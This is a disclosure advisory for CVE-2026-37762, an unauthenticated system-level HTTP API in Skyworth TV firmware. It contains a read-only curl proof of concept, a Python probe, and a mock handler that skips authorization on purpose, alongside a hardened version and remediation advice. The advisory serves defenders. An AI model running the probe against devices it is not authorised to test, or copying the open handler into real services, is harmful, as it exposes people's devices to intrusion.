Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-37762 |
| Vulnerability Type | Missing Authentication / Insecure Permissions |
| CWE | CWE-306, CWE-732 |
| Attack Vector | Adjacent Network (AV:A, same Wi-Fi or LAN segment) |
| CVSS v3.1 Base Score | 8.8 (High) |
| CVSS v3.1 Vector | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Assigned By | MITRE |
| Status | Published |
| Discovered By | Mohammed Alzahrani |
Affected Products
| Field | Value |
|---|---|
| Device | Skyworth SW-22AE NF (MediaTek m7332 platform) |
| Firmware Build | SW/SW6H_TG_NF/SW6H:11/RTT2.220103.001/20250701:user/release-keys |
| Android Version | 11 |
| Security Patch | 2025-06-01 |
| Vulnerable App | com.smartdevice.dailyshortcut (DailyHub) |
| App Version | 1.0.268.250721 (versionCode 1000268) |
| System UID | userId=1000 |
| Code Path | /system_ext/app/DailyHub |
Description
The DailyHub system application (com.smartdevice.dailyshortcut), pre-installed on Skyworth Android TV devices, exposes two unauthenticated network services:
- HTTP server on TCP port 8081 — via NanoHTTPD, accepting JSON-RPC style POST requests
- Plaintext TCP control service on port 8888 — accepting raw control commands
Both services require no authentication, pairing, or authorization of any kind.
Affected components:
- com.smartdevice.dailyshortcut
- com.smartdevice.ipcontrol.SddpService
- com.smartdevice.ipcontrol.IPControlService
- com.smartdevice.ipcontrol.server.IPControlServer (NanoHTTPD on port 8081)
- com.smartdevice.ipcontrol.processor.SystemRequestProcessor (/system)
A network-adjacent attacker (same Wi-Fi or LAN segment) can send crafted HTTP POST requests to http://<TV_IP>:8081/* with JSON payloads of the form:

```json
{"method": "<method_name>", "params": [...]}
```

The request path selects the processor (for example /system is handled by SystemRequestProcessor) and the method field selects the operation within it. Because the application runs with the shared Android system UID (userId=1000), successful exploitation gives the attacker access to privileged system-level operations that no third-party app could reach.
Impact
- Remote Command Execution — Any method exposed by the request processors can be invoked over the unauthenticated HTTP API
- Privilege Escalation — System-level access (userId=1000) granted to an unauthenticated network attacker
- Information Disclosure — Device configuration, internal state, and system information exposed (the PoC below retrieves it with a single request)
- Denial of Service — Device can be disrupted or rendered unresponsive via crafted requests
Proof of Concept (Safe, Non-Destructive)
The following request retrieves system information without any credentials:
```bash
curl -s -X POST 'http://<TV_IP>:8081/system' \
  -H 'Content-Type: application/json' \
  --data '{"method":"getSystemInformation","params":[]}'
```

Replace <TV_IP> with the target device's IP address on the local network. No token, PIN, or pairing is required. An HTTP 200 response carrying device information confirms the issue; a 401/403 response or a refused connection indicates that the service is either not running or has been fixed.

This PoC is non-destructive and only reads device information. It demonstrates that the HTTP API is fully unauthenticated.
Remediation
For users:
- Isolate smart TV devices on a dedicated VLAN or IoT network segment
- Block TCP ports 8081 and 8888 on the TV from all untrusted segments, including guest Wi-Fi
- Apply firmware updates from Skyworth when available
- Monitor for unexpected connections to or from TV devices
For the vendor:
- Implement authentication and authorization for all exposed network services
- Disable unauthenticated access to system-level methods
- Bind services to localhost unless explicit user consent is obtained
- Require pairing/PIN before accepting remote commands
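The following Python script is an added example and is not code from the DailyHub app or the Skyworth firmware. It ties together the request shape described above and the vendor-side fixes in this list: a mock server that behaves like the advisory describes (any POST /system is executed with no check), a hardened variant of the same handler that requires a pairing token and binds to loopback, and a probe that sends the PoC request and reports whether the endpoint answered without credentials. The response body, the X-Pairing-Token header name and the token value are constructed for the example; the real getSystemInformation output is not on this page.

```python
"""Mock DailyHub-style /system endpoint (vulnerable and hardened) plus a probe.

Added example, not the vendor's code. Only the request shape from the
advisory is reproduced: POST /system with {"method": ..., "params": [...]}.
"""
import hmac
import json
import secrets
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib import error, request

# Constructed response; the device's real output is not known from the advisory.
FAKE_SYSTEM_INFO = {"model": "mock-tv", "android": "11"}


class VulnerableHandler(BaseHTTPRequestHandler):
    """Models the reported behaviour: every caller is trusted."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length") or 0)
        raw = self.rfile.read(length)  # drain the body before answering
        if not self.authorized():
            self._json(401, {"error": "pairing required"})
            return
        try:
            body = json.loads(raw or b"{}")
        except ValueError:
            self._json(400, {"error": "bad json"})
            return
        if self.path == "/system" and body.get("method") == "getSystemInformation":
            self._json(200, {"result": FAKE_SYSTEM_INFO})
        else:
            self._json(404, {"error": "unknown method"})

    def authorized(self):
        return True  # the flaw: no token, PIN or pairing is ever checked

    def _json(self, status, payload):
        data = json.dumps(payload).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request logging
        pass


class HardenedHandler(VulnerableHandler):
    """Same API, but a paired client must present a secret token (hypothetical header)."""
    pairing_token = ""  # set per server instance by start_server()

    def authorized(self):
        presented = self.headers.get("X-Pairing-Token", "")
        # constant-time comparison so the token cannot be guessed byte by byte
        return hmac.compare_digest(presented.encode(), self.pairing_token.encode())


def start_server(handler_cls, bind_addr="127.0.0.1", token=None):
    """Start a background server on an ephemeral port and return it.

    The real device listens on all interfaces; a fixed build should bind to
    loopback (the default here) unless the user explicitly enables LAN control.
    """
    if token is not None:
        handler_cls = type("PairedHandler", (handler_cls,), {"pairing_token": token})
    srv = ThreadingHTTPServer((bind_addr, 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe_dailyhub(host, port, timeout=3.0):
    """Send the advisory's PoC request; 200 with a body means no auth was needed."""
    payload = json.dumps({"method": "getSystemInformation", "params": []}).encode()
    req = request.Request(
        f"http://{host}:{port}/system",
        data=payload,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with request.urlopen(req, timeout=timeout) as resp:
            body = json.loads(resp.read() or b"null")
            return {"unauthenticated": resp.status == 200, "status": resp.status, "body": body}
    except error.HTTPError as e:  # 401/403/404: the service answered but refused
        return {"unauthenticated": False, "status": e.code, "body": None}
    except (error.URLError, OSError):  # closed port, wrong host, timeout
        return {"unauthenticated": False, "status": None, "body": None}


if __name__ == "__main__":
    vuln = start_server(VulnerableHandler)
    hard = start_server(HardenedHandler, token=secrets.token_urlsafe(16))
    print("vulnerable:", probe_dailyhub(*vuln.server_address))
    print("hardened:  ", probe_dailyhub(*hard.server_address))
    vuln.shutdown()
    hard.shutdown()
```

Against a real device, call probe_dailyhub("<TV_IP>", 8081); it only issues the same read-only getSystemInformation request as the curl PoC. The hardened handler differs from the vulnerable one in a single method, which is the point: the fix is an authorization check in front of the dispatcher, not a change to the API itself.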
Disclosure Timeline
| Date | Event |
|---|---|
| 2026 | Vulnerability discovered |
| 2026 | Reported to vendor |
| 2026 | Vendor acknowledged |
| 2026-06-28 | CVE-2026-37762 assigned by MITRE |
References
Discovered by Mohammed Alzahrani